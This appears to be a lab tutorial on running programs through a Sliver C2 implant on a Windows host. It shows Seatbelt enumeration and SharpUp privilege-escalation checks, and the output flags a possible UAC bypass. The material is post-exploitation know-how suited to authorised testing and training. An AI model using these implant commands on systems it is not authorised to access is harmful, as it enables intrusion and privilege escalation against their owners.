Skip to main content

Using the Execute Command

Start up the Windows session with the implant created earlier. Once the session contacts the server, be sure to use the session.

While Sliver has a lot of built-in commands, it also includes an execute command which is used to run commands on the target host.

[server] sliver (winsession) > help execute

Execute a program on the remote system

Usage:
======
  execute [flags] command [arguments...]

Args:
=====
  command    string         command to execute
  arguments  string list    arguments to the command

Flags:
======
  -h, --help                    display help
  -S, --ignore-stderr           don't print STDERR output
  -X, --loot                    save output as loot
  -n, --name          string    name to assign loot (optional)
  -o, --output                  capture command output
  -P, --ppid          uint      parent process id (optional, Windows only) (default: 0)
  -s, --save                    save output to a file
  -E, --stderr        string    remote path to redirect STDERR to
  -O, --stdout        string    remote path to redirect STDOUT to
  -t, --timeout       int       command timeout in seconds (default: 60)
  -T, --token                   execute command with current token (windows only)

I have placed the Seatbelt.exe file on my target host. Running that will gather some enumeration from the target.

sliver (winsession) > execute -o Seatbelt.exe -q OSInfo

[*] Output:
====== OSInfo ======

  Hostname                      :  WinLaptop
  Domain Name                   :
  Username                      :  WinLaptop\steve
  ProductName                   :  Windows 10 Pro
  EditionID                     :  Professional
  ReleaseId                     :  2009
  Build                         :  22631.4169
  BuildBranch                   :  ni_release
  CurrentMajorVersionNumber     :  10
  CurrentVersion                :  6.3
  Architecture                  :  AMD64
  ProcessorCount                :  8
  IsVirtualMachine              :  False
  BootTimeUtc (approx)          :  9/11/2024 2:18:04 AM (Total uptime: 24:16:55:12)
  HighIntegrity                 :  False
  IsLocalAdmin                  :  True
    [*] In medium integrity but user is a local administrator - UAC can be bypassed.
  CurrentTimeUtc                :  10/5/2024 7:13:16 PM (Local time: 10/5/2024 3:13:16 PM)
  TimeZone                      :  Eastern Standard Time
  TimeZoneOffset                :  -04:00:00
  InputLanguage                 :  US
  InstalledInputLanguages       :  US
  MachineGuid                   :  7d6861d3-b56b-44b8-83de-760039c6a2c1

sliver (winsession) >

A similar example running SharpUp.exe.

sliver (winsession) > execute -o SharpUp.exe audit

[*] Output:

=== SharpUp: Running Privilege Escalation Checks ===

[*] In medium integrity but user is a local administrator- UAC can be bypassed.

[*] Audit mode: running an additional 15 check(s).
[!] Modifialbe scheduled tasks were not evaluated due to permissions.

=== Modifiable Folders in %PATH% ===
        C:\Users\steve\Downloads\platform-tools\platform-tools


[*] Completed Privesc Checks in 25 seconds

sliver (winsession) >

One thing to keep in mind when using the execute command is that there is a default 60 second timeout. If the command you are executing takes longer than that, then you will need to specify the additional time. This is accomplished with the -t <int> flag.

-t, --timeout       int       command timeout in seconds (default: 60)

In this example, I set the timeout to 120 seconds:

sliver (winsession) > execute -o -t 120 Seatbelt.exe -q -group=system